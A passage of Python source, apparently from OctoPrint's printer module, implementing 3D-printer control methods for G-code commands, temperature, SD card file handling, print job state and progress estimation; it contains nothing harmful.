**kwargs):\n \"\"\"\n Closes the connection to the printer.\n \"\"\"\n eventManager().fire(Events.DISCONNECTING)\n if self._comm is not None:\n self._comm.close()\n else:\n eventManager().fire(Events.DISCONNECTED)\n self._firmware_info = None\n\n def get_transport(self, *args, **kwargs):\n if self._comm is None:\n return None\n\n return self._comm.getTransport()\n\n getTransport = util.deprecated(\n \"getTransport has been renamed to get_transport\",\n since=\"1.2.0-dev-590\",\n includedoc=\"Replaced by :func:`get_transport`\",\n )\n\n def job_on_hold(self, blocking=True, *args, **kwargs):\n if self._comm is None:\n raise RuntimeError(\"No connection to the printer\")\n return self._comm.job_put_on_hold(blocking=blocking)\n\n def set_job_on_hold(self, value, 
blocking=True, *args, **kwargs):\n if self._comm is None:\n raise RuntimeError(\"No connection to the printer\")\n return self._comm.set_job_on_hold(value, blocking=blocking)\n\n def fake_ack(self, *args, **kwargs):\n if self._comm is None:\n return\n\n self._comm.fakeOk()\n\n def commands(self, commands, tags=None, force=False, *args, **kwargs):\n \"\"\"\n Sends one or more gcode commands to the printer.\n \"\"\"\n if self._comm is None:\n return\n\n if not isinstance(commands, (list, tuple)):\n commands = [commands]\n\n if tags is None:\n tags = set()\n tags |= {\"trigger:printer.commands\"}\n\n for command in commands:\n self._comm.sendCommand(command, tags=tags, force=force)\n\n def script(\n self, name, context=None, must_be_set=True, part_of_job=False, *args, **kwargs\n ):\n if self._comm is None:\n return\n\n if name is None or not name:\n raise ValueError(\"name must be set\")\n\n # .capitalize() will lowercase all letters but the first\n # this code preserves existing CamelCase\n event_name = name[0].upper() + name[1:]\n\n event_start = f\"GcodeScript{event_name}Running\"\n payload = context.get(\"event\", None) if isinstance(context, dict) else None\n\n eventManager().fire(event_start, payload)\n\n result = self._comm.sendGcodeScript(\n name,\n part_of_job=part_of_job,\n replacements=context,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.script\"},\n )\n if not result and must_be_set:\n raise UnknownScript(name)\n\n event_end = f\"GcodeScript{event_name}Finished\"\n eventManager().fire(event_end, payload)\n\n def jog(self, axes, relative=True, speed=None, *args, **kwargs):\n if isinstance(axes, str):\n # legacy parameter format, there should be an amount as first anonymous positional arguments too\n axis = axes\n\n if not len(args) >= 1:\n raise ValueError(\"amount not set\")\n amount = args[0]\n if not isinstance(amount, (int, float)):\n raise ValueError(f\"amount must be a valid number: {amount}\")\n\n axes = {}\n axes[axis] = amount\n\n if not axes:\n raise ValueError(\"At least one axis to jog must be provided\")\n\n for axis in axes:\n if axis not in PrinterInterface.valid_axes:\n raise ValueError(\n \"Invalid axis {}, valid axes are {}\".format(\n axis, \", \".join(PrinterInterface.valid_axes)\n )\n )\n\n command = \"G0 {}\".format(\n \" \".join([f\"{axis.upper()}{amt}\" for axis, amt in axes.items()])\n )\n\n if speed is None:\n printer_profile = self._printerProfileManager.get_current_or_default()\n speed = min(printer_profile[\"axes\"][axis][\"speed\"] for axis in axes)\n\n if speed and not isinstance(speed, bool):\n command += f\" F{speed}\"\n\n if relative:\n commands = [\"G91\", command, \"G90\"]\n else:\n commands = [\"G90\", command]\n\n self.commands(commands, tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.jog\"})\n\n def home(self, axes, *args, **kwargs):\n if not isinstance(axes, (list, tuple)):\n if isinstance(axes, str):\n axes = [axes]\n else:\n raise ValueError(f\"axes is neither a list nor a string: {axes}\")\n\n validated_axes = list(\n filter(\n lambda x: x in PrinterInterface.valid_axes, map(lambda x: x.lower(), axes)\n )\n )\n if len(axes) != len(validated_axes):\n raise ValueError(f\"axes contains invalid axes: {axes}\")\n\n self.commands(\n [\n \"G91\",\n \"G28 %s\" % \" \".join(map(lambda x: \"%s0\" % x.upper(), validated_axes)),\n \"G90\",\n ],\n tags=kwargs.get(\"tags\", set) | {\"trigger:printer.home\"},\n )\n\n def extrude(self, amount, speed=None, *args, **kwargs):\n if not isinstance(amount, (int, float)):\n raise 
ValueError(f\"amount must be a valid number: {amount}\")\n\n printer_profile = self._printerProfileManager.get_current_or_default()\n\n # Use specified speed (if any)\n max_e_speed = printer_profile[\"axes\"][\"e\"][\"speed\"]\n\n if speed is None:\n # No speed was specified so default to value configured in printer profile\n extrusion_speed = max_e_speed\n else:\n # Make sure that specified value is not greater than maximum as defined in printer profile\n extrusion_speed = min([speed, max_e_speed])\n\n self.commands(\n [\"G91\", \"M83\", \"G1 E%s F%d\" % (amount, extrusion_speed), \"M82\", \"G90\"],\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.extrude\"},\n )\n\n def change_tool(self, tool, *args, **kwargs):\n if not PrinterInterface.valid_tool_regex.match(tool):\n raise ValueError(f'tool must match \"tool[0-9]+\": {tool}')\n\n tool_num = int(tool[len(\"tool\") :])\n self.commands(\n \"T%d\" % tool_num,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.change_tool\"},\n )\n\n def set_temperature(self, heater, value, *args, **kwargs):\n if not PrinterInterface.valid_heater_regex.match(heater):\n raise ValueError(\n 'heater must match \"tool[0-9]+\", \"bed\" or \"chamber\": {heater}'.format(\n heater=heater\n )\n )\n\n if not isinstance(value, (int, float)) or value < 0:\n raise ValueError(f\"value must be a valid number >= 0: {value}\")\n\n tags = kwargs.get(\"tags\", set()) | {\"trigger:printer.set_temperature\"}\n\n if heater.startswith(\"tool\"):\n printer_profile = self._printerProfileManager.get_current_or_default()\n extruder_count = printer_profile[\"extruder\"][\"count\"]\n shared_nozzle = printer_profile[\"extruder\"][\"sharedNozzle\"]\n if extruder_count > 1 and not shared_nozzle:\n toolNum = int(heater[len(\"tool\") :])\n self.commands(f\"M104 T{toolNum} S{value}\", tags=tags)\n else:\n self.commands(f\"M104 S{value}\", tags=tags)\n\n elif heater == \"bed\":\n self.commands(f\"M140 S{value}\", tags=tags)\n\n elif heater == \"chamber\":\n self.commands(f\"M141 S{value}\", tags=tags)\n\n def set_temperature_offset(self, offsets=None, *args, **kwargs):\n if offsets is None:\n offsets = {}\n\n if not isinstance(offsets, dict):\n raise ValueError(\"offsets must be a dict\")\n\n validated_keys = list(\n filter(lambda x: PrinterInterface.valid_heater_regex.match(x), offsets.keys())\n )\n validated_values = list(\n filter(lambda x: isinstance(x, (int, float)), offsets.values())\n )\n\n if len(validated_keys) != len(offsets):\n raise ValueError(f\"offsets contains invalid keys: {offsets}\")\n if len(validated_values) != len(offsets):\n raise ValueError(f\"offsets contains invalid values: {offsets}\")\n\n if self._comm is None:\n return\n\n self._comm.setTemperatureOffset(offsets)\n self._setOffsets(self._comm.getOffsets())\n\n def _convert_rate_value(self, factor, min_val=None, max_val=None):\n if not isinstance(factor, (int, float)):\n raise ValueError(\"factor is not a number\")\n\n if isinstance(factor, float):\n factor = int(factor * 100)\n\n if min_val and factor < min_val:\n raise ValueError(f\"factor must be a value >={min_val}\")\n elif max_val and factor > max_val:\n raise ValueError(f\"factor must be a value <={max_val}\")\n\n return factor\n\n def feed_rate(self, factor, *args, **kwargs):\n factor = self._convert_rate_value(factor, min_val=1)\n self.commands(\n \"M220 S%d\" % factor,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.feed_rate\"},\n )\n\n def flow_rate(self, factor, *args, **kwargs):\n factor = self._convert_rate_value(factor, 
min_val=1)\n self.commands(\n \"M221 S%d\" % factor,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.flow_rate\"},\n )\n\n def select_file(\n self, path, sd, printAfterSelect=False, user=None, pos=None, *args, **kwargs\n ):\n if self._comm is None or (self._comm.isBusy() or self._comm.isStreaming()):\n self._logger.info(\"Cannot load file: printer not connected or currently busy\")\n return\n\n self._validateJob(path, sd)\n\n origin = FileDestinations.SDCARD if sd else FileDestinations.LOCAL\n if sd:\n path_on_disk = \"/\" + path\n path_in_storage = path\n else:\n path_on_disk = self._fileManager.path_on_disk(origin, path)\n path_in_storage = self._fileManager.path_in_storage(origin, path_on_disk)\n\n try:\n recovery_data = self._fileManager.get_recovery_data()\n if recovery_data:\n # clean up recovery data if we just selected a different file\n actual_origin = recovery_data.get(\"origin\", None)\n actual_path = recovery_data.get(\"path\", None)\n\n if (\n actual_origin is None\n or actual_path is None\n or actual_origin != origin\n or actual_path != path_in_storage\n ):\n self._fileManager.delete_recovery_data()\n except Exception:\n # anything goes wrong with the recovery data, we ignore it\n self._logger.exception(\n \"Something was wrong with processing the recovery data\"\n )\n\n self._printAfterSelect = printAfterSelect\n self._posAfterSelect = pos\n self._comm.selectFile(\n \"/\" + path if sd else path_on_disk,\n sd,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.select_file\"},\n )\n self._updateProgressData()\n self._setCurrentZ(None)\n\n def unselect_file(self, *args, **kwargs):\n if self._comm is not None and (self._comm.isBusy() or self._comm.isStreaming()):\n return\n\n self._comm.unselectFile()\n self._updateProgressData()\n self._setCurrentZ(None)\n\n def get_file_position(self):\n if self._comm is None:\n return None\n\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return None\n\n return self._comm.getFilePosition()\n\n def get_markings(self):\n return self._markings\n\n def start_print(self, pos=None, user=None, *args, **kwargs):\n \"\"\"\n Starts the currently loaded print job.\n Only starts if the printer is connected and operational, not currently printing and a printjob is loaded\n \"\"\"\n if (\n self._comm is None\n or not self._comm.isOperational()\n or self._comm.isPrinting()\n ):\n return\n\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return\n\n self._fileManager.delete_recovery_data()\n\n self._lastProgressReport = None\n self._updateProgressData()\n self._setCurrentZ(None)\n self._comm.startPrint(\n pos=pos,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.start_print\"},\n )\n\n def pause_print(self, user=None, *args, **kwargs):\n \"\"\"\n Pause the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n if self._comm.isPaused():\n return\n\n self._comm.setPause(\n True,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.pause_print\"},\n )\n\n def resume_print(self, user=None, *args, **kwargs):\n \"\"\"\n Resume the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n if not self._comm.isPaused():\n return\n\n self._comm.setPause(\n False,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.resume_print\"},\n )\n\n def cancel_print(self, user=None, *args, **kwargs):\n \"\"\"\n Cancel the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n # tell comm layer to cancel - will also trigger our cancelled 
handler\n # for further processing\n self._comm.cancelPrint(\n user=user, tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.cancel_print\"}\n )\n\n def log_lines(self, *lines):\n serial_logger = logging.getLogger(\"SERIAL\")\n self.on_comm_log(\"\\n\".join(lines))\n for line in lines:\n serial_logger.debug(line)\n\n def get_state_string(self, state=None, *args, **kwargs):\n if self._comm is None:\n return \"Offline\"\n else:\n return self._comm.getStateString(state=state)\n\n def get_state_id(self, state=None, *args, **kwargs):\n if self._comm is None:\n return \"OFFLINE\"\n else:\n return self._comm.getStateId(state=state)\n\n def get_error(self):\n if self._comm is None:\n return \"\"\n else:\n return self._comm.getErrorString()\n\n def get_current_data(self, *args, **kwargs):\n return util.thaw_frozendict(self._stateMonitor.get_current_data())\n\n def get_current_job(self, *args, **kwargs):\n currentData = self._stateMonitor.get_current_data()\n return util.thaw_frozendict(currentData[\"job\"])\n\n def get_current_temperatures(self, *args, **kwargs):\n if self._comm is not None:\n offsets = self._comm.getOffsets()\n else:\n offsets = {}\n\n last = self._temps.last\n if last is None:\n return {}\n\n return {\n key: {\n \"actual\": value[\"actual\"],\n \"target\": value[\"target\"],\n \"offset\": offsets[key] if offsets.get(key) is not None else 0,\n }\n for key, value in last.items()\n if key != \"time\"\n }\n\n def get_temperature_history(self, *args, **kwargs):\n return list(self._temps)\n\n def get_current_connection(self, *args, **kwargs):\n if self._comm is None:\n return \"Closed\", None, None, None\n\n port, baudrate = self._comm.getConnection()\n printer_profile = self._printerProfileManager.get_current_or_default()\n return self._comm.getStateString(), port, baudrate, printer_profile\n\n def is_closed_or_error(self, *args, **kwargs):\n return self._comm is None or self._comm.isClosedOrError()\n\n def is_operational(self, *args, **kwargs):\n return self._comm is not None and self._comm.isOperational()\n\n def is_printing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPrinting()\n\n def is_cancelling(self, *args, **kwargs):\n return self._comm is not None and self._comm.isCancelling()\n\n def is_pausing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPausing()\n\n def is_paused(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPaused()\n\n def is_resuming(self, *args, **kwargs):\n return self._comm is not None and self._comm.isResuming()\n\n def is_finishing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isFinishing()\n\n def is_error(self, *args, **kwargs):\n return self._comm is not None and self._comm.isError()\n\n def is_ready(self, *args, **kwargs):\n return (\n self.is_operational()\n and not self._comm.isBusy()\n # isBusy is true when paused\n and not self._comm.isStreaming()\n )\n\n def is_sd_ready(self, *args, **kwargs):\n if not settings().getBoolean([\"feature\", \"sdSupport\"]) or self._comm is None:\n return False\n else:\n return self._comm.isSdReady()\n\n # ~~ sd file handling\n\n def get_sd_files(self, *args, **kwargs):\n if not self.is_sd_ready():\n return []\n\n if kwargs.get(\"refresh\"):\n self.refresh_sd_files(blocking=True)\n\n return list(\n map(\n lambda x: {\"name\": x[0][1:], \"size\": x[1], \"display\": x[2], \"date\": x[3]},\n self._comm.getSdFiles(),\n )\n )\n\n def add_sd_file(\n self, filename, path, on_success=None, on_failure=None, *args, 
**kwargs\n    ):\n        if not self._comm or self._comm.isBusy() or not self._comm.isSdReady():\n            self._logger.error("No connection to printer or printer is busy")\n            return\n\n        self._streamingFinishedCallback = on_success\n        self._streamingFailedCallback = on_failure\n\n        def sd_upload_started(local_filename, remote_filename):\n            eventManager().fire(\n                Events.TRANSFER_STARTED,\n                {"local": local_filename, "remote": remote_filename},\n            )\n\n        def sd_upload_succeeded(local_filename, remote_filename, elapsed):\n            payload = {\n                "local": local_filename,\n                "remote": remote_filename,\n                "time": elapsed,\n            }\n            eventManager().fire(Events.TRANSFER_DONE, payload)\n            if callable(self._streamingFinishedCallback):\n                self._streamingFinishedCallback(\n                    remote_filename, remote_filename, FileDestinations.SDCARD\n                )\n\n        def sd_upload_failed(local_filename, remote_filename, elapsed):\n            payload = {\n                "local": local_filename,\n                "remote": remote_filename,\n                "time": elapsed,\n            }\n            eventManager().fire(Events.TRANSFER_FAILED, payload)\n            if callable(self._streamingFailedCallback):\n                self._streamingFailedCallback(\n                    remote_filename, remote_filename, FileDestinations.SDCARD\n                )\n\n        for name, hook in self.sd_card_upload_hooks.items():\n            # first sd card upload plugin that feels responsible gets the job\n            try:\n                result = hook(\n                    self,\n                    filename,\n                    path,\n                    sd_upload_started,\n                    sd_upload_succeeded,\n                    sd_upload_failed,\n                    *args,\n                    **kwargs,\n                )\n                if result is not None:\n                    return result\n            except Exception:\n                self._logger.exception(\n                    "There was an error running the sd upload "\n                    "hook provided by plugin {}".format(name),\n                    extra={"plugin": name},\n                )\n\n        else:\n            # no plugin feels responsible, use the default implementation\n            return self._add_sd_file(filename, path, tags=kwargs.get("tags"))\n\n    def _get_free_remote_name(self, filename):\n        self.refresh_sd_files(blocking=True)\n        existingSdFiles = list(map(lambda x: x[0], self._comm.getSdFiles()))\n\n        if valid_file_type(filename, "gcode"):\n            # figure out remote filename\n            remote_name = util.get_dos_filename(\n                filename,\n                existing_filenames=existingSdFiles,\n                extension="gco",\n                whitelisted_extensions=["gco", "g"],\n            )\n        else:\n            # probably something else added through a plugin, use its basename as-is\n            remote_name = os.path.basename(filename)\n\n        return remote_name\n\n    def _add_sd_file(self, filename, path, tags=None):\n        if tags is None:\n            tags = set()\n\n        self._create_estimator("stream")\n        remote_name = self._comm.startFileTransfer(\n            path,\n            filename,\n            special=not valid_file_type(filename, "gcode"),\n            tags=tags | {"trigger:printer.add_sd_file"},\n        )\n\n        return remote_name\n\n    def delete_sd_file(self, filename, *args, **kwargs):\n        if not self._comm or not self._comm.isSdReady():\n            return\n        self._comm.deleteSdFile(\n            "/" + filename,\n            tags=kwargs.get("tags", set()) | {"trigger:printer.delete_sd_file"},\n        )\n\n    def init_sd_card(self, *args, **kwargs):\n        if not self._comm or self._comm.isSdReady():\n            return\n        self._comm.initSdCard(\n            tags=kwargs.get("tags", set()) | {"trigger:printer.init_sd_card"}\n        )\n\n    def release_sd_card(self, *args, **kwargs):\n        if not self._comm or not self._comm.isSdReady():\n            return\n        self._comm.releaseSdCard(\n            tags=kwargs.get("tags", set()) | {"trigger:printer.release_sd_card"}\n        )\n\n    def refresh_sd_files(self, blocking=False, *args, **kwargs):\n        """\n        Refreshes the list of files stored on the SD card attached to the printer (if available and printer communication\n        available). 
Optional blocking parameter allows making the method block (max 10s) until the file list has been\n received (and can be accessed via self._comm.getSdFiles()). Defaults to an asynchronous operation.\n \"\"\"\n if not self._comm or not self._comm.isSdReady():\n return\n self._comm.refreshSdFiles(\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.refresh_sd_files\"},\n blocking=blocking,\n timeout=kwargs.get(\"timeout\", 10),\n )\n\n # ~~ state monitoring\n\n def _setOffsets(self, offsets):\n self._stateMonitor.set_temp_offsets(offsets)\n\n def _setCurrentZ(self, currentZ):\n self._currentZ = currentZ\n self._stateMonitor.set_current_z(self._currentZ)\n\n def _setState(self, state, state_string=None, error_string=None):\n if state_string is None:\n state_string = self.get_state_string()\n if error_string is None:\n error_string = self.get_error()\n\n self._state = state\n self._stateMonitor.set_state(\n self._dict(text=state_string, flags=self._getStateFlags(), error=error_string)\n )\n\n payload = {\n \"state_id\": self.get_state_id(self._state),\n \"state_string\": self.get_state_string(self._state),\n }\n eventManager().fire(Events.PRINTER_STATE_CHANGED, payload)\n\n def _addLog(self, log):\n self._log.append(log)\n self._stateMonitor.add_log(log)\n\n def _addMessage(self, message):\n self._messages.append(message)\n self._stateMonitor.add_message(message)\n\n def _updateProgressData(\n self,\n completion=None,\n filepos=None,\n printTime=None,\n printTimeLeft=None,\n printTimeLeftOrigin=None,\n ):\n self._stateMonitor.set_progress(\n self._dict(\n completion=int(completion * 100) if completion is not None else None,\n filepos=filepos,\n printTime=int(printTime) if printTime is not None else None,\n printTimeLeft=int(printTimeLeft) if printTimeLeft is not None else None,\n printTimeLeftOrigin=printTimeLeftOrigin,\n )\n )\n\n def _updateProgressDataCallback(self):\n if self._comm is None:\n progress = None\n filepos = None\n printTime = None\n cleanedPrintTime = None\n else:\n progress = self._comm.getPrintProgress()\n filepos = self._comm.getPrintFilepos()\n printTime = self._comm.getPrintTime()\n cleanedPrintTime = self._comm.getCleanedPrintTime()\n\n printTimeLeft = printTimeLeftOrigin = None\n estimator = self._estimator\n if progress is not None:\n progress_int = int(progress * 100)\n if self._lastProgressReport != progress_int:\n self._lastProgressReport = progress_int\n self._reportPrintProgressToPlugins(progress_int)\n\n if progress == 0:\n printTimeLeft = None\n printTimeLeftOrigin = None\n elif progress == 1:\n printTimeLeft = 0\n printTimeLeftOrigin = None\n elif estimator is not None:\n statisticalTotalPrintTime = None\n statisticalTotalPrintTimeType = None\n with self._selectedFileMutex:\n if (\n self._selectedFile\n and \"estimatedPrintTime\" in self._selectedFile\n and self._selectedFile[\"estimatedPrintTime\"]\n ):\n statisticalTotalPrintTime = self._selectedFile[\n \"estimatedPrintTime\"\n ]\n statisticalTotalPrintTimeType = self._selectedFile.get(\n \"estimatedPrintTimeType\", None\n )\n\n try:\n printTimeLeft, printTimeLeftOrigin = estimator.estimate(\n progress,\n printTime,\n cleanedPrintTime,\n statisticalTotalPrintTime,\n statisticalTotalPrintTimeType,\n )\n if printTimeLeft is not None:\n printTimeLeft = int(printTimeLeft)\n except Exception:\n self._logger.exception(\n f\"Error while estimating print time via {estimator}\"\n )\n\n return self._dict(\n completion=progress * 100 if progress is not None else None,\n filepos=filepos,\n printTime=int(printTime) if 
printTime is not None else None,\n            printTimeLeft=int(printTimeLeft) if printTimeLeft is not None else None,\n            printTimeLeftOrigin=printTimeLeftOrigin,\n        )\n\n    def _updateResendDataCallback(self):\n        if not self._comm:\n            return self._dict(count=0, transmitted=0, ratio=0)\n        return self._dict(\n            count=self._comm.received_resends,\n            transmitted=self._comm.transmitted_lines,\n            ratio=int(self._comm.resend_ratio * 100),\n        )\n\n    def _addTemperatureData(self, tools=None, bed=None, chamber=None, custom=None):\n        if tools is None:\n            tools = {}\n        if custom is None:\n            custom = {}\n\n        data = {"time": int(time.time())}\n        for tool in tools.keys():\n            data["tool%d" % tool] = self._dict(\n                actual=tools[tool][0], target=tools[tool][1]\n            )\n        if bed is not None and isinstance(bed, tuple):\n            data["bed"] = self._dict(actual=bed[0], target=bed[1])\n        if chamber is not None and isinstance(chamber, tuple):\n            data["chamber"] = self._dict(actual=chamber[0], target=chamber[1])\n        for identifier, values in custom.items():\n            data[identifier] = self._dict(actual=values[0], target=values[1])\n\n        self._temps.append(data)\n\n        self._stateMonitor.add_temperature(self._dict(**data))\n\n    def _validateJob(self, filename, sd):\n        if not valid_file_type(filename, type="machinecode"):\n            raise InvalidFileType(f"{filename} is not a machinecode file, cannot print")\n\n        if sd:\n            return\n\n        path_on_disk = self._fileManager.path_on_disk(FileDestinations.LOCAL, filename)\n        if os.path.isabs(filename) and not filename == path_on_disk:\n            raise InvalidFileLocation(\n                "{} is not located within local storage, cannot select for printing".format(\n                    filename\n                )\n            )\n        if not os.path.isfile(path_on_disk):\n            raise InvalidFileLocation(\n                "{} does not exist in local storage, cannot select for printing".format(\n                    filename\n                )\n            )\n\n    def _setJobData(self, filename, filesize, sd, user=None, data=None):\n        with self._selectedFileMutex:\n            if filename is not None:\n                if sd:\n                    name_in_storage = filename\n                    if name_in_storage.startswith("/"):\n                        name_in_storage = name_in_storage[1:]\n                    path_in_storage = name_in_storage\n                    path_on_disk = None\n                else:\n                    path_in_storage = self._fileManager.path_in_storage(\n                        FileDestinations.LOCAL, filename\n                    )\n                    path_on_disk = self._fileManager.path_on_disk(\n                        FileDestinations.LOCAL, filename\n                    )\n                    _, name_in_storage = self._fileManager.split_path(\n                        FileDestinations.LOCAL, path_in_storage\n                    )\n                self._selectedFile = {\n                    "filename": path_in_storage,\n                    "filesize": filesize,\n                    "sd": sd,\n                    "estimatedPrintTime": None,\n                    "user": user,\n                }\n            else:\n                self._selectedFile = None\n                self._stateMonitor.set_job_data(\n                    self._dict(\n                        file=self._dict(\n                            name=None,\n                            path=None,\n                            display=None,\n                            origin=None,\n                            size=None,\n                            date=None,\n                        ),\n                        estimatedPrintTime=None,\n                        averagePrintTime=None,\n                        lastPrintTime=None,\n                        filament=None,\n                        user=None,\n                    )\n                )\n                return\n\n            estimatedPrintTime = None\n            lastPrintTime = None\n            averagePrintTime = None\n            date = None\n            filament = None\n            display_name = name_in_storage\n\n            if path_on_disk:\n                # Use an int for mtime because it could be float and the\n                # javascript needs an exact match\n                date = int(os.stat(path_on_disk).st_mtime)\n\n                try:\n                    fileData = self._fileManager.get_metadata(\n                        FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n                        path_on_disk,\n                    )\n                except Exception:\n                    self._logger.exception("Error generating fileData")\n                    fileData = None\n                if fileData is not None:\n                    if fileData.get("display"):\n                        display_name = fileData["display"]\n                    if isinstance(fileData.get("analysis"), dict):\n                        
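# estimates from the gcode analysis only serve as a fallback; per-profile statistics recorded for the file take precedence further below\n                        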
if estimatedPrintTime is None and fileData[\"analysis\"].get(\n \"estimatedPrintTime\"\n ):\n estimatedPrintTime = fileData[\"analysis\"][\n \"estimatedPrintTime\"\n ]\n if fileData[\"analysis\"].get(\"filament\"):\n filament = fileData[\"analysis\"][\"filament\"]\n if isinstance(fileData.get(\"statistics\"), dict):\n printer_profile = (\n self._printerProfileManager.get_current_or_default()[\"id\"]\n )\n if printer_profile in fileData[\"statistics\"].get(\n \"averagePrintTime\", {}\n ):\n averagePrintTime = fileData[\"statistics\"][\"averagePrintTime\"][\n printer_profile\n ]\n if printer_profile in fileData[\"statistics\"].get(\n \"lastPrintTime\", {}\n ):\n lastPrintTime = fileData[\"statistics\"][\"lastPrintTime\"][\n printer_profile\n ]\n\n if averagePrintTime is not None:\n self._selectedFile[\"estimatedPrintTime\"] = averagePrintTime\n self._selectedFile[\"estimatedPrintTimeType\"] = \"average\"\n elif estimatedPrintTime is not None:\n # TODO apply factor which first needs to be tracked!\n self._selectedFile[\"estimatedPrintTime\"] = estimatedPrintTime\n self._selectedFile[\"estimatedPrintTimeType\"] = \"analysis\"\n\n elif data:\n display_name = data.longname\n date = data.timestamp\n\n self._stateMonitor.set_job_data(\n self._dict(\n file=self._dict(\n name=name_in_storage,\n path=path_in_storage,\n display=display_name,\n origin=FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n size=filesize,\n date=date,\n ),\n estimatedPrintTime=estimatedPrintTime,\n averagePrintTime=averagePrintTime,\n lastPrintTime=lastPrintTime,\n filament=filament,\n user=user,\n )\n )\n\n def _updateJobUser(self, user):\n with self._selectedFileMutex:\n if (\n self._selectedFile is not None\n and self._selectedFile.get(\"user\", None) != user\n ):\n self._selectedFile[\"user\"] = user\n\n job_data = self.get_current_job()\n self._stateMonitor.set_job_data(\n self._dict(\n file=job_data[\"file\"],\n estimatedPrintTime=job_data[\"estimatedPrintTime\"],\n averagePrintTime=job_data[\"averagePrintTime\"],\n lastPrintTime=job_data[\"lastPrintTime\"],\n filament=job_data[\"filament\"],\n user=user,\n )\n )\n\n def _sendInitialStateUpdate(self, callback):\n try:\n data = self._stateMonitor.get_current_data()\n data.update(\n temps=list(self._temps),\n logs=list(self._log),\n messages=list(self._messages),\n markings=list(self._markings),\n )\n\n plugin_data = self._get_additional_plugin_data(initial=False)\n if plugin_data:\n data.update(plugins=copy.deepcopy(plugin_data))\n\n callback.on_printer_send_initial_data(data)\n except Exception:\n self._logger.exception(\n \"Error while pushing initial state update to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _getStateFlags(self):\n return self._dict(\n operational=self.is_operational(),\n printing=self.is_printing(),\n cancelling=self.is_cancelling(),\n pausing=self.is_pausing(),\n resuming=self.is_resuming(),\n finishing=self.is_finishing(),\n closedOrError=self.is_closed_or_error(),\n error=self.is_error(),\n paused=self.is_paused(),\n ready=self.is_ready(),\n sdReady=self.is_sd_ready(),\n )\n\n # ~~ comm.MachineComPrintCallback implementation\n\n def on_comm_log(self, message):\n \"\"\"\n Callback method for the comm object, called upon log output.\n \"\"\"\n self._addLog(to_unicode(message, \"utf-8\", errors=\"replace\"))\n\n def on_comm_temperature_update(self, tools, bed, chamber, custom=None):\n if custom is None:\n custom = {}\n self._addTemperatureData(\n tools=copy.deepcopy(tools),\n 
bed=copy.deepcopy(bed),\n chamber=copy.deepcopy(chamber),\n custom=copy.deepcopy(custom),\n )\n\n def on_comm_position_update(self, position, reason=None):\n payload = {\"reason\": reason}\n payload.update(position)\n eventManager().fire(Events.POSITION_UPDATE, payload)\n\n def on_comm_state_change(self, state):\n \"\"\"\n Callback method for the comm object, called if the connection state changes.\n \"\"\"\n oldState = self._state\n\n state_string = None\n error_string = None\n if self._comm is not None:\n state_string = self._comm.getStateString()\n error_string = self._comm.getErrorString()\n\n if oldState in (comm.MachineCom.STATE_PRINTING,):\n # if we were still printing and went into an error state, mark the print as failed\n if state in (\n comm.MachineCom.STATE_CLOSED,\n comm.MachineCom.STATE_ERROR,\n comm.MachineCom.STATE_CLOSED_WITH_ERROR,\n ):\n with self._selectedFileMutex:\n if self._selectedFile is not None:\n payload = self._payload_for_print_job_event()\n if payload:\n payload[\"time\"] = self._comm.getPrintTime()\n payload[\"reason\"] = \"error\"\n payload[\"error\"] = self._comm.getErrorString()\n\n def finalize():\n self._fileManager.log_print(\n payload[\"origin\"],\n payload[\"path\"],\n time.time(),\n payload[\"time\"],\n False,\n self._printerProfileManager.get_current_or_default()[\n \"id\"\n ],\n )\n eventManager().fire(Events.PRINT_FAILED, payload)\n\n thread = threading.Thread(target=finalize)\n thread.daemon = True\n thread.start()\n\n try:\n self._analysisQueue.resume() # printing done, put those cpu cycles to good use\n except Exception:\n self._logger.exception(\"Error while resuming the analysis queue\")\n\n elif state == comm.MachineCom.STATE_PRINTING:\n if settings().get([\"gcodeAnalysis\", \"runAt\"]) == \"idle\":\n try:\n self._analysisQueue.pause() # only analyse files while idle\n except Exception:\n self._logger.exception(\"Error while pausing the analysis queue\")\n\n if (\n state == comm.MachineCom.STATE_CLOSED\n or state == comm.MachineCom.STATE_CLOSED_WITH_ERROR\n ):\n if self._comm is not None:\n self._comm = None\n\n with self._selectedFileMutex:\n if self._selectedFile is not None:\n eventManager().fire(Events.FILE_DESELECTED)\n self._setJobData(None, None, None)\n\n self._updateProgressData()\n self._setCurrentZ(None)\n self._setOffsets(None)\n self._addTemperatureData()\n self._printerProfileManager.deselect()\n\n eventManager().fire(Events.DISCONNECTED)\n\n self._setState(state, state_string=state_string, error_string=error_string)\n\n def on_comm_message(self, message):\n \"\"\"\n Callback method for the comm object, called upon message exchanges via serial.\n Stores the message in the message buffer, truncates buffer to the last 300 lines.\n \"\"\"\n self._addMessage(to_unicode(message, \"utf-8\", errors=\"replace\"))\n\n def on_comm_progress(self):\n \"\"\"\n Callback method for the comm object, called upon any change in progress of the printjob.\n Triggers storage of new values for printTime, printTimeLeft and the current progress.\n \"\"\"\n\n self._stateMonitor.trigger_progress_update()\n\n def on_comm_z_change(self, newZ):\n \"\"\"\n Callback method for the comm object, called upon change of the z-layer.\n \"\"\"\n oldZ = self._currentZ\n if newZ != oldZ:\n # we have to react to all z-changes, even those that might \"go backward\" due to a slicer's retraction or\n # anti-backlash-routines. 
